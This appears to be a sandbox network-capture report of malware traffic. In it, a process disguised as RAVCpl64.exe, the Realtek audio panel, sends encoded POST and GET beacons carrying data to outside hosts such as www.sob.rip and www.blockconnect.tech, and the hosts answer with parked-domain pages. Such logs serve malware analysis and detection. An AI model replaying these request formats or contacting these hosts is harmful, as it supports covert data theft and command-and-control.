                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 73 4a 67 31 54 45 31 41 79 51 58 6f 55 30 4b 45 64 50 62 56 37 46 53 51 33 49 37 62 72 38 58 58 53 37 68 71 52 44 74 42 50 46 69 57 42 4f 68 32 55 71 7a 39 30 65 59 71 76 34 33 46 7a 2f 64 4e 36 48 30 41 67 74 32 41 34 45 6e 47 37 69 6b 52 2f 4f 4f 48 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:38.706302881 CET498INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjQzMWMzMjEtMjgzYi00ZmFlLTkzN2YtYzU3NDQ3MjllNDNjIiwicGFnZV90aW1lIjoxNzM0MDM2OTM4LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLyI


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.11.2049741199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:41.237845898 CET649OUTPOST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 62 78 5a 57 68 2f 46 48 56 76 4a 76 62 63 69 74 7a 62 4a 79 48 46 54 5a 46 6d 72 39 64 71 6a 72 71 75 31 43 32 46 71 39 42 49 39 36 76 33 4f 52 68 53 34 43 57 2f 62 74 49 6a 42 45 32 45 4a 61 46 54 64 61 43 43 53 35 43 31 35 4a 4a 59 42 6b 5a 71 34 65 6f 33 68 74 37 69 43 78 7a 63 36 4d 51 51 56 51 35 42 4e 74 41 67 51 73 79 35 68 36 4a 53 42 39 44 4b 68 73 2f 4e 66 57 4e 30 49 70 66 76 39 65 71 4d 59 46 65 64 2f 42 33 55 72 49 44 37 55 45 47 52 56 62 51 52 64 2b 2b 6d 53 76 69 70 58 63 32 39 51 63 5a 31 45 59 4d 68 34 77 71 6d 71 52 36 57 73 61 51 4a 69 65 43 47 34 45 35 46 49 2b 33 47 45 56 6b 66 62 35 56 6f 79 43 6a 49 2f 48 38 44 30 3d
                                                                                        Data Ascii: Sb=bxZWh/FHVvJvbcitzbJyHFTZFmr9dqjrqu1C2Fq9BI96v3ORhS4CW/btIjBE2EJaFTdaCCS5C15JJYBkZq4eo3ht7iCxzc6MQQVQ5BNtAgQsy5h6JSB9DKhs/NfWN0Ipfv9eqMYFed/B3UrID7UEGRVbQRd++mSvipXc29QcZ1EYMh4wqmqR6WsaQJieCG4E5FI+3GEVkfb5VoyCjI/H8D0=
                                                                                        Dec 12, 2024 21:55:41.369225979 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:40 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 2c012780-2377-4a12-ae65-04934ea643f0
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=2c012780-2377-4a12-ae65-04934ea643f0; expires=Thu, 12 Dec 2024 21:10:41 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 73 4a 67 31 54 45 31 41 79 51 58 6f 55 30 4b 45 64 50 62 56 37 46 53 51 33 49 37 62 72 38 58 58 53 37 68 71 52 44 74 42 50 46 69 57 42 4f 68 32 55 71 7a 39 30 65 59 71 76 34 33 46 7a 2f 64 4e 36 48 30 41 67 74 32 41 34 45 6e 47 37 69 6b 52 2f 4f 4f 48 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:41.369245052 CET498INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmMwMTI3ODAtMjM3Ny00YTEyLWFlNjUtMDQ5MzRlYTY0M2YwIiwicGFnZV90aW1lIjoxNzM0MDM2OTQxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLyI


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.11.2049742199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:43.880404949 CET1289OUTPOST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 62 78 5a 57 68 2f 46 48 56 76 4a 76 62 63 69 74 7a 62 4a 79 48 46 54 5a 46 6d 72 39 64 71 6a 72 71 75 31 43 32 46 71 39 42 49 31 36 76 42 61 52 67 31 55 43 58 2f 62 74 4c 6a 42 46 32 45 4a 44 46 54 45 54 43 43 58 4d 43 77 31 4a 49 37 35 6b 66 62 34 65 2f 6e 68 74 79 43 43 30 75 4d 36 5a 51 51 6b 34 35 42 64 74 41 67 51 73 79 2f 46 36 4a 41 35 39 46 4b 68 72 38 4e 65 43 4a 30 49 4e 66 75 59 6c 71 4d 4d 37 65 4e 66 42 33 31 62 49 42 4a 38 45 4f 52 56 6a 63 78 64 51 2b 6d 58 33 69 70 4c 6d 32 38 6c 4a 5a 32 30 59 50 32 4a 32 79 6c 47 32 73 30 63 53 63 5a 71 7a 4f 48 38 67 77 33 45 65 36 56 56 30 73 34 72 4d 4c 35 2f 4e 37 4a 54 38 68 58 59 54 4e 4f 4f 2f 32 42 48 38 45 65 75 64 65 69 30 5a 4c 64 30 59 7a 4a 32 38 58 71 4b 67 65 58 31 2f 6d 6c 32 50 31 76 37 46 77 63 4e 76 49 4e 42 69 31 58 37 61 57 4d 43 48 65 70 42 47 6c 77 2f 4b 67 4b 6f 51 38 79 69 62 77 44 7a 46 74 67 52 6c 4f 34 38 39 48 47 4d 58 57 4d 4e 5a 50 2f 56 72 37 33 32 6d 51 38 69 58 76 55 6b 36 53 71 67 4a 75 43 6b 54 6b 72 6d [TRUNCATED]
                                                                                        Data Ascii: Sb=bxZWh/FHVvJvbcitzbJyHFTZFmr9dqjrqu1C2Fq9BI16vBaRg1UCX/btLjBF2EJDFTETCCXMCw1JI75kfb4e/nhtyCC0uM6ZQQk45BdtAgQsy/F6JA59FKhr8NeCJ0INfuYlqMM7eNfB31bIBJ8EORVjcxdQ+mX3ipLm28lJZ20YP2J2ylG2s0cScZqzOH8gw3Ee6VV0s4rML5/N7JT8hXYTNOO/2BH8Eeudei0ZLd0YzJ28XqKgeX1/ml2P1v7FwcNvINBi1X7aWMCHepBGlw/KgKoQ8yibwDzFtgRlO489HGMXWMNZP/Vr732mQ8iXvUk6SqgJuCkTkrmKeD2hTjyMaA39+l5XKTRpX0xcxCa3NgkKKOwWXyzIDNM0HFyEMggKrZrUSYXl2WVzlofYyBYTnRsigbmAWQ25/Mc/ykYorQjWkNqj2nJujzZM6EzpkLAAC7p57OkreK/E67B8Tbdf5CjjJW1QipOcPr8SXhVyuLnCVnCKLauGfJ2SFBdKqPOipOulgnF2r86f8tfx1uEaPxoeVo4EIcfeRbi59re+tgUIP+bvZgeZTAKaFPoP5N4G0DRhTrFVWsmnMcp99linYFvhCHq97SYMKhWyEzx9Z50JIwosXu4S67sHEYYy4m5LFMC9ujOTh2eS3Sm9xsUORPrX+LBt9qVyHrQ+sLvYxPWqqXzVKKyS7upp02bZrtUGwrtnd77kqOroXoGc2XCuUQBNQb6IkVGXhkB+0+BDI6OtiBE9QYx1aw4r/985SrZpFB4LD6IzxCfaDZIgQjuSj3OwQst5NSIxN7L5/7ajErJvmvzfGcpKHEzr5HsSj3cK3Pw2QTKdZih6C087/O7
                                                                                        Dec 12, 2024 21:55:43.880458117 CET5156OUTData Raw: 50 59 65 77 55 49 48 65 33 61 4b 31 78 2f 69 45 7a 63 49 78 6a 39 69 46 6d 2b 32 4a 65 6c 69 55 35 47 6e 41 57 59 44 6e 2b 6c 53 6f 7a 5a 4b 62 44 4b 4e 2f 41 4c 6c 63 35 68 6b 44 77 6f 47 57 6e 63 53 44 75 61 4e 59 6d 50 77 6c 58 61 35 72 2f 37
                                                                                        Data Ascii: PYewUIHe3aK1x/iEzcIxj9iFm+2JeliU5GnAWYDn+lSozZKbDKN/ALlc5hkDwoGWncSDuaNYmPwlXa5r/7udqkgjWf2stLO8fI1I7LMLb0VxPwOV0hDvjQyL+WVLpx0A9Ux8Kl67XLD6sd/mezKGTrq1TdY4Jt/I4WzigFNbCg+yK7jf3j6hAd4ThrfoGipDCz4hbWUa/w8UuqDLWs1xDGNwpAHdm4LARaZHpEMZd6sLOmwVgLU
                                                                                        Dec 12, 2024 21:55:43.880502939 CET1353OUTData Raw: 58 37 61 63 6b 37 38 54 65 5a 4e 42 42 73 4d 65 57 45 41 71 51 50 41 6f 31 72 53 58 4c 77 56 37 63 4a 2b 6f 4b 72 75 2b 48 73 5a 4a 53 78 59 34 2b 58 63 42 6e 4a 2b 58 57 72 4c 7a 30 67 4d 30 58 65 7a 73 49 56 72 66 57 67 56 71 52 6e 2f 79 41 7a
                                                                                        Data Ascii: X7ack78TeZNBBsMeWEAqQPAo1rSXLwV7cJ+oKru+HsZJSxY4+XcBnJ+XWrLz0gM0XezsIVrfWgVqRn/yAzk1WFzJEQuT/6rBOuZ5ljztfCxcKAhUZj6IFioHKyoHVxsjHXauE7TGoOc6mLEdvZByjt9lJrpnig6STywry9z510UHfWvdZBZloq4mY9CWNASIdNX36ShJ4vqB5n/7pexDlCdpxg8VObIlx0PFU17VgBVbmt69mnS
                                                                                        Dec 12, 2024 21:55:44.012053013 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:43 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: f6ea57ab-8a5e-4219-87a8-99656c3d6992
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=f6ea57ab-8a5e-4219-87a8-99656c3d6992; expires=Thu, 12 Dec 2024 21:10:43 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 73 4a 67 31 54 45 31 41 79 51 58 6f 55 30 4b 45 64 50 62 56 37 46 53 51 33 49 37 62 72 38 58 58 53 37 68 71 52 44 74 42 50 46 69 57 42 4f 68 32 55 71 7a 39 30 65 59 71 76 34 33 46 7a 2f 64 4e 36 48 30 41 67 74 32 41 34 45 6e 47 37 69 6b 52 2f 4f 4f 48 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:44.012065887 CET498INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjZlYTU3YWItOGE1ZS00MjE5LTg3YTgtOTk2NTZjM2Q2OTkyIiwicGFnZV90aW1lIjoxNzM0MDM2OTQzLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLyI


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.11.2049743199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:46.532443047 CET377OUTGET /tp8k/?Hsa=KVXAK1dJ22EyzD&Sb=Wzx2iIlwW+94es3u4Lo0FS74KiXnatT9p9we6G2JYq0Bn2uTvRtkednmI39Cm2I2dBYZfF7KG0N4DZZkU64bjEcb6QrTm/GIaTVemQQoPiAr/pRWHyNTKL8= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:46.663615942 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:45 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1450
                                                                                        x-request-id: 721997bd-5b5d-43ec-a523-0bab8437e4c9
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yveCLs2WyVfzFDf1GOwUFtqq/OwBkJNvB35PkBrb6MkhKrTK5N0OZqAue9eGyMW9JZ8Y5rM5O/xMgvJ0N0t3dw==
                                                                                        set-cookie: parking_session=721997bd-5b5d-43ec-a523-0bab8437e4c9; expires=Thu, 12 Dec 2024 21:10:46 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 76 65 43 4c 73 32 57 79 56 66 7a 46 44 66 31 47 4f 77 55 46 74 71 71 2f 4f 77 42 6b 4a 4e 76 42 33 35 50 6b 42 72 62 36 4d 6b 68 4b 72 54 4b 35 4e 30 4f 5a 71 41 75 65 39 65 47 79 4d 57 39 4a 5a 38 59 35 72 4d 35 4f 2f 78 4d 67 76 4a 30 4e 30 74 33 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yveCLs2WyVfzFDf1GOwUFtqq/OwBkJNvB35PkBrb6MkhKrTK5N0OZqAue9eGyMW9JZ8Y5rM5O/xMgvJ0N0t3dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:46.663629055 CET850INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzIxOTk3YmQtNWI1ZC00M2VjLWE1MjMtMGJhYjg0MzdlNGM5IiwicGFnZV90aW1lIjoxNzM0MDM2OTQ2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLz9


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.11.204974476.223.54.146807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:51.965357065 CET659OUTPOST /b9be/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.blockconnect.tech
                                                                                        Origin: http://www.blockconnect.tech
                                                                                        Referer: http://www.blockconnect.tech/b9be/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 77 4d 46 31 30 61 63 6f 61 65 62 4f 67 45 35 42 6e 49 68 53 4c 6c 42 70 56 39 38 66 44 35 6f 37 4f 57 55 71 33 42 46 61 45 44 69 47 75 36 64 70 38 69 6a 73 31 55 70 75 64 35 50 36 37 67 50 39 74 43 48 45 69 56 68 48 50 57 4d 32 6e 53 42 61 68 4a 66 79 4d 36 65 59 4c 35 57 47 46 53 49 39 56 6b 78 41 71 78 70 62 48 33 48 68 4a 78 4f 31 6a 69 61 4f 35 4f 79 4f 6a 4a 37 46 4b 72 49 61 6c 71 63 70 54 47 68 4f 6c 7a 49 67 73 5a 77 49 53 6b 4a 75 32 33 70 6d 77 31 66 55 65 56 53 79 53 46 51 2b 4a 51 64 75 7a 57 63 79 75 4f 6f 53 61 4a 55 5a 46 43 67 73 68 71 44 6c 41 73 55 33 59 51 3d 3d
                                                                                        Data Ascii: Sb=wMF10acoaebOgE5BnIhSLlBpV98fD5o7OWUq3BFaEDiGu6dp8ijs1Upud5P67gP9tCHEiVhHPWM2nSBahJfyM6eYL5WGFSI9VkxAqxpbH3HhJxO1jiaO5OyOjJ7FKrIalqcpTGhOlzIgsZwISkJu23pmw1fUeVSySFQ+JQduzWcyuOoSaJUZFCgshqDlAsU3YQ==
                                                                                        Dec 12, 2024 21:55:52.096324921 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.11.204974576.223.54.146807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:54.626027107 CET679OUTPOST /b9be/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.blockconnect.tech
                                                                                        Origin: http://www.blockconnect.tech
                                                                                        Referer: http://www.blockconnect.tech/b9be/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 77 4d 46 31 30 61 63 6f 61 65 62 4f 6d 6b 4a 42 72 50 56 53 4d 46 42 71 57 39 38 66 4d 5a 6f 2f 4f 57 49 71 33 41 42 4b 45 78 47 47 70 62 74 70 39 6a 6a 73 67 55 70 75 58 5a 50 2f 6d 77 4f 7a 74 43 4b 35 69 56 64 48 50 57 59 32 6e 53 52 61 68 34 66 31 50 4b 65 61 65 4a 57 45 4c 79 49 39 56 6b 78 41 71 77 4e 78 48 7a 6a 68 4a 42 2b 31 69 42 43 52 30 75 79 4e 69 4a 37 46 41 4c 49 65 6c 71 64 4f 54 48 39 6f 6c 31 45 67 73 63 4d 49 54 31 4a 74 68 48 70 67 2f 56 65 65 56 46 76 37 61 46 30 33 47 6e 68 67 31 48 41 6c 76 59 6c 49 48 37 67 39 47 52 38 65 6c 61 36 4e 43 75 56 73 46 63 68 44 38 64 4a 6c 65 4c 39 7a 46 6f 57 4d 46 75 77 57 62 4f 41 3d
